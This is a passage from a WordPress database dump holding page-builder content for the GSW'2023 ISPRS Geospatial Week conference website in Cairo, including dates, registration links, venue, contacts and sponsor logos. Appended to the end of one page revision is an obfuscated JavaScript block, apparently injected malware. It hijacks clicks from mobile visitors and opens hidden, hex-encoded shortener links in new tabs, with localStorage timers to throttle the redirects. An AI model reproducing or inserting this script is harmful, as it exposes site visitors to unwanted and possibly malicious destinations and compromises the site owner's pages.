css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153474011{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153388835{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-01 08:46:26','2023-06-01 08:46:26','',3066,'https://gsw2023.com/?p=4603',0,'revision','',0),
(4604,1,'2023-06-01 08:46:52','2023-06-01 08:46:52','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" 